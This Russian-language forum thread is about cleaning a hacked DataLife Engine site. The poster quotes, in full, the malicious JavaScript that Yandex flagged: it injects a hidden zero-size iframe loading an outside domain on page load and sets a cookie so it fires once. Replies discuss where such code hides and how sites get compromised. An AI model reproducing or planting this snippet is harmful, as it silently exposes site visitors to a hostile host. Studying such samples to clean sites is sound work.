Перейти к публикации

Рекомендованные сообщения

Здравствуйте. Помогите у меня на сайте яндекс нашел вредоносный код, написал в подержку они ответили что

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в .js-скриптах вредоносный код следующего содержания:

var ifFOiH7f = document.createElement('iframe');ifFOiH7f.name = 'ifFOiH7f';ifFOiH7f.src = 'http://ruty.shan38.com/';ifFOiH7f.style.width = '0px';ifFOiH7f.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('ifFOiH7f=') == -1) { document.getElementsByTagName('body')[0].appendChild(ifFOiH7f); document.cookie = 'ifFOiH7f=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}};

Где может быть эта гадость? Зарание спасибо. Написалбы в платную подержку дле но я сегодня тольеко зарегистрировался на форуме, доступ еще не получил

Изменено пользователем devil331
Ссылка на сообщение
Поделиться на других сайтах

Где может быть эта гадость?

Да собственно где угодно в куче файлов Вашего скрипта, также этот код может быть в зашифрованном виде...

Так по коду никто не скажет, искать ручками надо...

Ссылка на сообщение
Поделиться на других сайтах

нашел эту гадость только в одному файле, удалил. Интересно как это попало в двиг, походу зря покупал движек дле) ломают как хотят блин

Изменено пользователем devil331
Ссылка на сообщение
Поделиться на других сайтах

нашел эту гадость только в одному файле, удалил. Интересно как это попало в двиг, походу зря покупал движек дле) ломают как хотят блин

лично вы - зря покупали

Ссылка на сообщение
Поделиться на других сайтах

походу зря покупал движек дле

Совершенно зря.

Ссылка на сообщение
Поделиться на других сайтах

нашел эту гадость только в одному файле, удалил. Интересно как это попало в двиг, походу зря покупал движек дле) ломают как хотят блин

лично вы - зря покупали

очень зря

Ссылка на сообщение
Поделиться на других сайтах

devil331,

Глупо полагать, что от того что вы купили лицензию, ваш сайт стал в одночасье неуязвим. Во первых достаточно поставить какой либо некорректый сторонний модуль, чтобы скопроментировать весь сайт. Во вторых если вы раньше пользовались нелегальной копией и у вас был шелл на сервере, то от того что вы обновились он никуда не денется и вся система будет продолжать уставаться уязвимой. В третьих достаточно украсть у вас например FTP доступ. В четвертых достаточно поставит "левый" шаблон и у вас могу появится вредоносные JS скрипты И т.д. и т.п. Причин по которым у вас появилась проблема может быть тысячи. Безопасность вашего сайта зависит напрямую от вас, а не от кого то другого, и если вы не сможете обеспечить элементарную безопасность, то вам ничего не поможет.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...